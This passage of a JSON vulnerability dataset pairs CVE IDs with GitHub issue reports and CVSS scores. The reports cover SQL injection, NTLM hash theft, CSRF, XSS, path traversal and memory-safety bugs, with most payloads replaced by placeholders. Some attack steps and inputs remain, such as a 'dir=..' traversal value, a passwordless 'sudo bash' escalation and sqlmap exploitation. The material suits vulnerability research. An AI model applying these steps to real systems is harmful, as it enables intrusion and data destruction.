        "Issue_Created_At": "2020-08-20T07:44:10Z",
        "description": "FILETAG APITAG FILETAG \u53ef\u80fd\u7684\u89e3\u51b3\u65b9\u6848 Possible Solution Limit http or https to get configuration files \u66f4\u591a\u4fe1\u606f APITAG CVETAG \u6f0f\u6d1e \u7c7b\u4f3c URLTAG \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u7cbe\u5fc3\u6784\u9020\u7684iframe APITAG \u4f8b\u5982 ( APITAG APITAG ) \u5e76\u8bbf\u95ee\u6307\u5b9aSMB\u670d\u52a1\u5668 APITAG \u8bbf\u95ee\u653b\u51fb\u8005\u6784\u9020SMB\u7684\u670d\u52a1\u5668\u83b7\u53d6\u914d\u7f6e\u6587\u4ef6\u65f6 Windows\u4f1a\u8fdb\u884cNTLM\u8ba4\u8bc1 \u53d1\u9001NTLM\u54c8\u5e0c\u5230\u653b\u51fb\u8005\u7684\u670d\u52a1\u5668 \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528NTLM\u54c8\u5e0c\u8fdb\u884c\u7528\u6237\u5bc6\u7801\u7834\u89e3\u7b49\u64cd\u4f5c \u8be5\u6f0f\u6d1e\u6709\u4e00\u5b9a\u7684\u5371\u5bb3\u6027",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24791",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/561",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/561",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2020-08-19T08:22:40Z",
        "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'fuel_replace_id' in PATHTAG FUEL CMS NUMBERTAG allows SQL Injection via parameter 'fuel_replace_id' in PATHTAG Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. POC: ERRORTAG Exploiting Step1. Burpsuite request payload: ERRORTAG Exploiting Setp2 use sqlmap and exploit it. APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24821",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/52",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/52",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:18:45Z",
        "description": "SEGV in function dwarf::cursor::skip_form at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_seg NUMBERTAG CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24822",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/50",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/50",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:16:38Z",
        "description": "SEGV in function dwarf::cursor::uleb NUMBERTAG at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_segv CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24823",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/51",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/51",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:17:23Z",
        "description": "SEGV in function dwarf::to_string at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_seg NUMBERTAG CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24824",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/48",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/48",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:10:45Z",
        "description": "Global Buffer Overflow in function dwarf::line_table::line_table at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump_line. The testcase is APITAG CVETAG . I use the following command: APITAG and get: ERRORTAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24825",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/46",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/46",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:07:30Z",
        "description": "SEGV in function line_table::line_table at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is dump_line_segv CVETAG . I use the following command: APITAG and got: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24826",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/49",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/49",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:15:40Z",
        "description": "SEGV in function elf::section::as_strtab at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump syms. The testcase is dump_syms_segv CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24827",
        "Issue_Url_old": "https://github.com/aclements/libelfin/issues/47",
        "Issue_Url_new": "https://github.com/aclements/libelfin/issues/47",
        "Repo_new": "aclements/libelfin",
        "Issue_Created_At": "2020-08-15T13:08:23Z",
        "description": "SEGV in function dwarf::cursor::skip_form at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is dump_line_seg NUMBERTAG CVETAG . I use the following command: APITAG and got: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24829",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1422",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1422",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-03-01T18:58:01Z",
        "description": "APITAG heap buffer overflow APITAG in gf_m2ts_section_complete. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Thanks dr3dd",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24847",
        "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/277",
        "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/277",
        "Repo_new": "xtr4nge/fruitywifi",
        "Issue_Created_At": "2020-10-02T18:17:30Z",
        "description": "Cross Site Request Forgery in APITAG NUMBERTAG ulnerability Description During the analysis of the product, it was observed that APITAG NUMBERTAG is vulnerable to Cross Site Request Forgery (CSRF) due to lack of CSRF protection in the APITAG endpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change of APITAG and APITAG value as per the attacker's choice. Steps to Reproduce NUMBERTAG Generate an HTML Proof of Concept with the below content. CODETAG NUMBERTAG Once the victim will open this HTML file, a CSRF request will be triggered to the legitimate server allowing the change of APITAG and hostapd_wpa_passphrase .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24848",
        "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/278",
        "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/278",
        "Repo_new": "xtr4nge/fruitywifi",
        "Issue_Created_At": "2020-10-02T18:22:50Z",
        "description": "Privilege Escalation via excessive SUDOER Permission in APITAG NUMBERTAG Description During the analysis, it was observed that it is possible to abuse the Sudoer permissions of the software to perform a Privilege Escalation attack. An attacker with fruitywifi user privileges would be able to exploit the issue NUMBERTAG and can gain complete root access by executing commands as the superuser. Since the software has excessive sudo rights defined, it is possible to simply elevate the privileges without supplying any password by performing a simple command sudo bash .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24870",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/330",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/330",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2020-08-19T02:03:53Z",
        "description": "stack buffer overflow in APITAG in APITAG poc: FILETAG reproduce steps NUMBERTAG compile libraw with Address sanitizer NUMBERTAG run command dcraw_emu APITAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24877",
        "Issue_Url_old": "https://github.com/h4ckdepy/zzzphp/issues/1",
        "Issue_Url_new": "https://github.com/h4ckdepy/zzzphp/issues/1",
        "Repo_new": "h4ckdepy/zzzphp",
        "Issue_Created_At": "2020-08-19T09:49:05Z",
        "description": "Vulnerability analysis.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24889",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/334",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/334",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2020-08-20T11:30:55Z",
        "description": "buffer overflow. Reproduce steps:",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24890",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/335",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/335",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2020-08-20T12:18:12Z",
        "description": "segmentation fault in APITAG Reproduce steps NUMBERTAG compile provided test.c NUMBERTAG run command: ./test poc Stack trace: ERRORTAG Poc: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-24930",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/191",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/191",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2020-08-25T05:05:34Z",
        "description": "wuzhicms NUMBERTAG Any file deletion vulnerability exists in the background. Any file deletion vulnerability was found in APITAG NUMBERTAG which allows an attacker to delete any other APITAG exploit condition is the login background and Directory overflow. Vulnerable PATHTAG ERRORTAG exploitation of vulnerability NUMBERTAG Enter the directory mode of the extension module FILETAG NUMBERTAG In directory mode, click return to the previous directory FILETAG APITAG parameters by capturing packets APITAG the parameter to \"dir=..\" FILETAG After the directory overflow, more delete options were found than before FILETAG APITAG FILETAG as a APITAG delete FILETAG FILETAG Delete the success! FILETAG NUMBERTAG We discover parameters by APITAG try to change the path to something else FILETAG NUMBERTAG A new FILETAG file was created on disk for the test FILETAG APITAG the parameter to \"URL PATHTAG FILETAG Delete the FILETAG cannot be found. FILETAG The POC is as follows: The path and parameters are determined according to the actual situation URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24939",
        "Issue_Url_old": "https://github.com/stampit-org/supermixer/issues/9",
        "Issue_Url_new": "https://github.com/stampit-org/supermixer/issues/9",
        "Repo_new": "stampit-org/supermixer",
        "Issue_Created_At": "2020-08-20T02:43:31Z",
        "description": "Prototype pollution. I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. Vulnerability Description: Prototype Pollution is a vulnerability affecting APITAG Prototype Pollution refers to the ability to inject properties into existing APITAG language construct prototypes, such as objects. Proof of Concept: CODETAG Impact : APITAG Access to restricted data, RCE (depends on implementation)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24944",
        "Issue_Url_old": "https://github.com/private-octopus/picoquic/issues/969",
        "Issue_Url_new": "https://github.com/private-octopus/picoquic/issues/969",
        "Repo_new": "private-octopus/picoquic",
        "Issue_Created_At": "2020-07-02T16:25:16Z",
        "description": "Denial of Service vulnerability (infinite loop) while parsing malicious QUIC frame. In picoquic QUIC server maliciously crafted QUIC frame triggers infinite loop while processing. Incorrect logical conditions in APITAG and APITAG leads to infinite loop after processing single packet in epoch NUMBERTAG Attack can be performed remotely without any user interaction and authentication. Proposed CVSS NUMBERTAG score: PATHTAG NUMBERTAG High) (picoquic can be used in embedded environments where infinite loop in one module affects whole system, because there is not pre emptive OS used) Packet that triggers this issue (attached zipped): APITAG To reproduce this issue in full server protocol session needs to be in state epoch NUMBERTAG ulnerable loop is located in function APITAG in picoquic/frames.c lines NUMBERTAG Log of the loop with displayed parameters and variables: APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG stream_id NUMBERTAG offset NUMBERTAG data_length NUMBERTAG fin NUMBERTAG consumed NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_maxsize NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG APITAG APITAG : bytes NUMBERTAG d NUMBERTAG bytes_ma NUMBERTAG stream_id NUMBERTAG offset NUMBERTAG data_length NUMBERTAG fin NUMBERTAG consumed NUMBERTAG Backtrace from gdb NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG bytes++; (gdb) bt NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG b NUMBERTAG in picoquic_parse_stream_header (bytes=bytes APITAG PATHTAG bytes_max=bytes_max APITAG APITAG APITAG APITAG fin=fin APITAG consumed NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG c3f1 in picoquic_decode_stream_frame (cnx=cnx APITAG bytes NUMBERTAG PATHTAG APITAG NUMBERTAG APITAG at PATHTAG NUMBERTAG f NUMBERTAG in picoquic_decode_frames (cnx=cnx APITAG path NUMBERTAG f NUMBERTAG bytes=<optimized out>, bytes APITAG NUMBERTAG APITAG epoch=epoch APITAG APITAG addr_to NUMBERTAG current_time NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in parse_frame_test (buffer NUMBERTAG byte_ma NUMBERTAG at PATHTAG NUMBERTAG fce in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG (gdb) bt full NUMBERTAG fb NUMBERTAG in picoquic_varint_decode (bytes NUMBERTAG PATHTAG bytes APITAG NUMBERTAG repeats NUMBERTAG times>, max_bytes=max_bytes APITAG n NUMBERTAG fffffffd NUMBERTAG at PATHTAG i NUMBERTAG length NUMBERTAG b NUMBERTAG in picoquic_parse_stream_header (bytes=bytes APITAG PATHTAG bytes_max=bytes_max APITAG APITAG APITAG APITAG fin=fin APITAG consumed NUMBERTAG fffffffd NUMBERTAG at PATHTAG ret NUMBERTAG len = <optimized out> off NUMBERTAG length NUMBERTAG l_stream NUMBERTAG l_len NUMBERTAG l_off NUMBERTAG byte_inde NUMBERTAG FUNCTION__ = APITAG NUMBERTAG c3f1 in picoquic_decode_stream_frame (cnx=cnx APITAG bytes NUMBERTAG PATHTAG APITAG NUMBERTAG APITAG at PATHTAG stream_id NUMBERTAG data_length NUMBERTAG offset NUMBERTAG fin NUMBERTAG consumed NUMBERTAG f NUMBERTAG in picoquic_decode_frames (cnx=cnx APITAG path NUMBERTAG f NUMBERTAG bytes=<optimized out>, bytes APITAG NUMBERTAG APITAG epoch=epoch APITAG APITAG addr_to NUMBERTAG current_time NUMBERTAG at PATHTAG first_byte = <optimized out> bytes_ma NUMBERTAG ack_needed = <optimized out> pc = APITAG packet_data = {acked_path NUMBERTAG last_ack_delay NUMBERTAG last_time_stamp_received NUMBERTAG largest_sent_time NUMBERTAG delivered_prior NUMBERTAG delivered_time_prior NUMBERTAG delivered_sent_prior NUMBERTAG rs_is_path_limited NUMBERTAG FUNCTION__ = \"picoquic_decode_frames NUMBERTAG f NUMBERTAG in parse_frame_test (buffer NUMBERTAG byte_ma NUMBERTAG at PATHTAG epoch NUMBERTAG ret NUMBERTAG simulated_time NUMBERTAG saddr = {sin_family NUMBERTAG sin_port NUMBERTAG sin_addr = {s_addr NUMBERTAG sin_zero = PATHTAG qclient NUMBERTAG FUNCTION__ = \"parse_frame_test\" t_ret NUMBERTAG cn NUMBERTAG fce in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG result NUMBERTAG Source code snippet to reproduce issue (rest of parameters are based on APITAG from APITAG picoquic_decode_frames(cnx, cnx >path FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-24949",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2312",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2312",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-05-04T06:01:50Z",
        "description": "Privilege escalation in php fusion NUMBERTAG Describe the bug Privilege escalation in php fusion NUMBERTAG ia allow authenticated user (not admin) send a crafted request to the server and remote excute command (RCE) which is should be excuted only by admin. It occurred when allow_php_execution is on. The problem was located in function: FILETAG . To Reproduce Steps to reproduce the behavior: Admin already turns on: Allow PHP Execution NUMBERTAG Login as editor (not admin NUMBERTAG Goto link: URLTAG APITAG Desktop (please complete the following information): OS: Windows NUMBERTAG Browser firefox Version [e.g NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24992",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/54",
        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/54",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2020-08-27T01:36:24Z",
        "description": "Vulnerability Report: APITAG in version NUMBERTAG there are two storage XSS vulnerabilities. The first XSS vulnerablity Question and answer module. In the Question supplement function, when inserting a link, fill in \"> APITAG APITAG alert NUMBERTAG APITAG The specific location of the vulnerability is shown in the figure APITAG the submission is approved by the admin user, the vulnerability will be triggered when the administrator opens the content management page. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-24994",
        "Issue_Url_old": "https://github.com/libass/libass/issues/422",
        "Issue_Url_new": "https://github.com/libass/libass/issues/422",
        "Repo_new": "libass/libass",
        "Issue_Created_At": "2020-08-27T02:18:39Z",
        "description": "stack overflow on APITAG parse_tag. Description A vulnerability was found in function parse_tag in APITAG ,which allow attackers to cause a denial of service or remote code execution via a crafted file. poc URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-24994",
        "Issue_Url_old": "https://github.com/libass/libass/issues/423",
        "Issue_Url_new": "https://github.com/libass/libass/issues/423",
        "Repo_new": "libass/libass",
        "Issue_Created_At": "2020-08-29T07:31:47Z",
        "description": "stack overflow on APITAG mystrcmp. Description A vulnerability was found in function mystrcmp in APITAG ,which allow attackers to cause a denial of service or remote code execution via a crafted file. FILETAG FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-25016",
        "Issue_Url_old": "https://github.com/kornelski/rust-rgb/issues/35",
        "Issue_Url_new": "https://github.com/kornelski/rust-rgb/issues/35",
        "Repo_new": "kornelski/rust-rgb",
        "Issue_Created_At": "2020-06-14T06:46:08Z",
        "description": "APITAG is unsound. The trait assumes that an arbitrary type APITAG can be viewed (and by your personal higher power even modified!) as a byte slice. That is super unsound. Here's an example of causing UB with it: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25219",
        "Issue_Url_old": "https://github.com/libproxy/libproxy/issues/134",
        "Issue_Url_new": "https://github.com/libproxy/libproxy/issues/134",
        "Repo_new": "libproxy/libproxy",
        "Issue_Created_At": "2020-09-07T17:47:52Z",
        "description": "pac server can trigger unbounded recursion in url.cpp APITAG I found this in APITAG CODETAG Looks like the server that hosts the proxy authconfig file can cause libproxy to overflow the stack by sending an unending stream of characters without a newline. The PAC server should be trusted to not do that, but it's still not good. Normal use with a non malicious server looks like this: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25340",
        "Issue_Url_old": "https://github.com/ntop/nDPI/issues/994",
        "Issue_Url_new": "https://github.com/ntop/ndpi/issues/994",
        "Repo_new": "ntop/ndpi",
        "Issue_Created_At": "2020-08-26T08:51:21Z",
        "description": "Memory leak in APITAG I am using nfstream to detect traffic, and the dissect option is turned on, which means that nfstream will use nDPI to complete this task. But I encountered a memory leak problem during use. Nfstream is developed based on the python language, memory leaks are rarely encountered, so I started to locate the cause. In nfstream, I located the reason for this line of code : FILETAG . In fact, the code calls the APITAG function in nDPI: FILETAG . By comparing the memory release operation in APITAG URLTAG and the prototype of the ndpi_flow_struct structure URLTAG , I think that APITAG has not completely released all the variables in ndpi_flow_struct. I think this may be the root cause of the memory leak.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-25394",
        "Issue_Url_old": "https://github.com/mozilo/mozilo2.0/issues/28",
        "Issue_Url_new": "https://github.com/mozilodaseinsteigercms/mozilo2.0/issues/28",
        "Repo_new": "mozilodaseinsteigercms/mozilo2.0",
        "Issue_Created_At": "2020-09-08T04:17:40Z",
        "description": "Cross Site Script Vulnerability on \"content\" in APITAG Admin. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Edit APITAG NUMBERTAG Insert Payload: '> APITAG NUMBERTAG Save NUMBERTAG Click Edit NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots NUMBERTAG Infor APITAG Admin: FILETAG NUMBERTAG Go to APITAG and Edit: FILETAG NUMBERTAG Insert Payload XSS: FILETAG NUMBERTAG SS Alert Message: FILETAG Desktop (please complete the following information): OS: Windows Browser Chorme Version NUMBERTAG APITAG Build NUMBERTAG bit)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-25414",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/469",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/469",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2020-09-03T13:11:48Z",
